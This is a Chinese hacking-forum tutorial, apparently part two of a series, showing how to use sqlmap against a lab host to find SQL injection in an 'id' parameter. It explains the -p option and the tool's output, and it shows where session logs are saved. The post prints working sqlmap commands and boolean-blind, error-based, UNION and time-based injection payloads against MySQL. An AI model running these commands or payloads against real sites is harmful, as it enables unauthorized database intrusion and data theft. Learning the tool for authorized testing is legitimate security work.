切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
270 SQLMAP 2[复制链接]
发表于 2012-9-13 01:25:16 | 显示全部楼层 |!read_mode!
测试存在注入
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1"
复制代码
出现:
  1. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
复制代码
使用ID作为注入参数 ,某些URL可能这样 1.php?id=1&p=2 你可以用-p指定参数
例如:
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -p id
复制代码
输出如下


RE:

  1. Place: GET
  2. Parameter: id
  3.     Type: boolean-based blind
  4.     Title: AND boolean-based blind - WHERE or HAVING clause
  5.     Payload: id=1 AND 7964=7964

  6.     Type: error-based
  7.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  8.     Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  9.     Type: UNION query
  10.     Title: MySQL UNION query (NULL) - 2 columns
  11.     Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

  12.     Type: AND/OR time-based blind
  13.     Title: MySQL > 5.0.11 AND time-based blind
  14.     Payload: id=1 AND SLEEP(5)
  15. ---
  16. [23:11:50] [INFO] the back-end DBMS is MySQL
  17. web server operating system: Linux Ubuntu 10.10 (Maverick Meerkat)
  18. web application technology: PHP 5.3.3, Apache 2.2.16
  19. back-end DBMS: MySQL 5.0
  20. [23:11:50] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

  21. [*] shutting down at 23:11:50
复制代码
输出解释
Place: GET
Parameter: id
提交类型和注入传递参数
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1 AND 7964=7964
注入方式的名字和Payload ,这里有3个 如下
  1. Type: boolean-based blind
  2.     Title: AND boolean-based blind - WHERE or HAVING clause
  3.     Payload: id=1 AND 7964=7964

  4.     Type: error-based
  5.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  6.     Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  7.     Type: UNION query
  8.     Title: MySQL UNION query (NULL) - 2 columns
  9.     Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

  10.     Type: AND/OR time-based blind
  11.     Title: MySQL > 5.0.11 AND time-based blind
  12.     Payload: id=1 AND SLEEP(5)
复制代码
说明能用3种方式注入
  1. [23:11:50] [INFO] the back-end DBMS is MySQL
  2. web server operating system: Linux Ubuntu 10.10 (Maverick Meerkat)
  3. web application technology: PHP 5.3.3, Apache 2.2.16
  4. back-end DBMS: MySQL 5.0
复制代码
系统版本
WEB版本
WEB程序版本
数据库版本
[23:11:50] [INFO] fetched data logged to text files under ‘/pen/sql/sqlmap/output/5.5.5.8′
保存的位置
  1. root@Dis9Team:~# cd /pen/sql/sqlmap/output/5.5.5.8/
  2. root@Dis9Team:/pen/sql/sqlmap/output/5.5.5.8# ls
  3. log  session.sqlite  target.txt
  4. root@Dis9Team:/pen/sql/sqlmap/output/5.5.5.8#
复制代码
查看一下数据
  1. root@Dis9Team:/pen/sql/sqlmap/output/5.5.5.8# cat log
  2. sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
  3. ---
  4. Place: GET
  5. Parameter: id
  6.     Type: boolean-based blind
  7.     Title: AND boolean-based blind - WHERE or HAVING clause
  8.     Payload: id=1 AND 7964=7964

  9.     Type: error-based
  10.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  11.     Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  12.     Type: UNION query
  13.     Title: MySQL UNION query (NULL) - 2 columns
  14.     Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

  15.     Type: AND/OR time-based blind
  16.     Title: MySQL > 5.0.11 AND time-based blind
  17.     Payload: id=1 AND SLEEP(5)
复制代码
下次输入相同的URL时 从中读取 不再进行测试



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-23 14:28

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部